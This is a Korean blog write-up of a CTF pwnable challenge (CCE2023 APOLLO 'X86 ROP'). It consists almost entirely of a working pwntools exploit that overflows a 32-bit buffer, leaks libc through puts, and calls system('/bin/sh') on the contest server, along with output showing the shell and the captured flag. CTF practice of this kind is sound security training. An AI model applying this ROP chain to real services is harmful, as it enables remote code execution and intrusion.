반응형
Description
X86 ROP
nc prob2.cstec.kr 5340
32비트 ROP 문제. 버퍼 오버플로 취약점이 존재하며, PIE가 꺼져 있다.
#!/usr/bin/python3
from pwn import *
p = remote("prob2.cstec.kr", 5340)
e = ELF("./x86_rop")
l = ELF("./libc.so.6")
p.sendlineafter(b"Enter choice : ", b"1")
r = 0x000000000040101a
pr = 0x080491e5
rdi = 0x0000000000401203
buf = b""
buf += b'A' * 24
buf += b'B' * 4
buf += p32(e.plt["puts"])
buf += p32(pr)
buf += p32(e.got["puts"])
buf += p32(e.sym["main"])
p.send(buf)
leak = p.recv(4)
leak = u32(leak)
leak -= l.sym["puts"]
print(hex(leak))
system = leak + l.sym["system"]
binsh = leak + list(l.search(b"/bin/sh"))[0]
p.sendlineafter(b"Enter choice : ", b"1")
buf = b""
buf += b'A' * 24
buf += b'B' * 4
buf += p32(system)
buf += p32(pr)
buf += p32(binsh)
p.send(buf)
p.interactive()
root@learner:/home/learner/Downloads/for_user# ./exploit.py
[+] Opening connection to prob2.cstec.kr on port 5340: Done
[*] '/home/learner/Downloads/for_user/x86_rop'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
[*] '/home/learner/Downloads/for_user/libc.so.6'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
0xf7c9c000
[*] Switching to interactive mode
$ ls
bin
boot
dev
etc
flag
home
lib
lib32
lib64
libx32
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
$ cat flag
apollob{a23c922d5d1c1b7c390241537c5e5021947d94151c4da48986482c4efbe74062ec2ac1f8d0130fa0dacdaf69ccd8c110801c420a86f781391661f0c2cd0b5f8a00}
반응형
'IT > CTF' 카테고리의 다른 글
CCE2023 APOLLO WEB HACKING [100] - Request forgery (0) | 2023.06.06 |
---|---|
CCE2023 APOLLO PWNABLE [100] - X64_ROP (0) | 2023.06.06 |
CCE2023 APOLLO CRYPTO [100] - Base64? (0) | 2023.06.06 |
CCE2023 APOLLO CRYPTO [100] - ROT (0) | 2023.06.04 |
CCE2023 APOLLO WEB HACKING [100] - reborn of php (0) | 2023.06.03 |